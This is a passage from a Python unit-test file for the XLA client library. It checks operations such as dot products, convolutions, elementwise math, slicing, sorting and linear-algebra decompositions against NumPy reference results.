ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testApproxTopK(self):
if self.backend.platform != "tpu":
self.skipTest("ApproxTopK is only supported on TPU")
k = 10
qy_size = 256
db_size = 3000
feature = 128
recall_target = 0.95
b = self._NewComputation()
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Gt(p0, q0)
comparator = b.build()
qy_shape = [qy_size, feature]
db_shape = [feature, db_size]
rng = np.random.RandomState(0)
qy_arg = rng.randn(*qy_shape).astype(np.float32)
db_arg = rng.randn(*db_shape).astype(np.float32)
b = self._NewComputation()
qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
scores = ops.Dot(qy, db)
iota = ops.Iota(
b,
xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
(qy_size, db_size)), 1)
init_val = ops.Constant(b, np.float32(-1))
init_arg = ops.Constant(b, np.int32(-1))
ground_truth = ops.TopK(scores, k=k)
approx_topk = ops.ApproxTopK(
b, [scores, iota], [init_val, init_arg],
top_k=k,
reduction_dim=1,
comparator=comparator,
recall_target=recall_target)
ops.Tuple(b, [
ops.GetTupleElement(ground_truth, 1),
ops.GetTupleElement(approx_topk, 1)
])
results = self._Execute(b, [qy_arg, db_arg])
ground_truth_docids = [set(x) for x in results[0]]
hits = sum(
len(list(x for x in approx_topk_per_q
if x in ground_truth_docids[q]))
for q, approx_topk_per_q in enumerate(results[1]))
self.assertGreater(hits / (qy_size * k), recall_target)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
